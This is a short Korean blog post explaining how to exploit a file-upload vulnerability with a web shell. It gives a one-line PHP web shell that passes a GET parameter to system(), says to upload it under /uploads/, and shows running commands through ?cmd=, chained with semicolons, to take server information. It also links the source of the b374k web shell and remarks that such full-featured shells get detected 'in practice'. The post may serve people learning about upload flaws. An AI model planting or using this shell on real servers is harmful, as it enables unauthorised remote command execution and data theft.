새소식

인기 검색어

IT & Security/Web

파일업로드 취약점 - 웹쉘

-

파일 업로드 취약점이 있는 곳이라면 가능.

실무에서는 b 374k 같은거 쓰면 잡혀가므로 한줄짜리로 웹쉘 취약점을 찾아보자.

https://github.com/tennc/webshell/blob/master/php/b374k/source/b374k-2.8.source.php

1. 아래 파일을 php로 만들어 놓는다.

<?php
system($_GET['cmd']);
?>

2. php파일을 생성했다면

올린 ip/uploads/a.php 라는 곳으로 접근하고 cmd에 접근 할 것이므로

?cmd = ls

이런식으로 명령어를 써준다

php는 get방식으로 cmd값을 system에 넘겨주고 있어서 명령이 성공적으로 먹힌다.

웹쉘 ok

서버 정보 탈취

명령어를 이으려면 세미콜론; 으로 이어주면 됨

'IT & Security > Web' 카테고리의 다른 글

mobaxterm 사용하기 (0)	2020.09.15
chcp 윈도우 한글깨짐 해결 (0)	2020.09.10
Stored XSS 실습 (0)	2020.08.25
인코딩(ascii, html, url, base 64 ..) (0)	2020.08.23

Contents

당신이 좋아할만한 콘텐츠

댓글 0

소중한 공감 감사합니다

Receive promotional offers?

포스팅 주소를 복사했습니다

이 글이 도움이 되었다면 공감 부탁드립니다.

티스토리툴바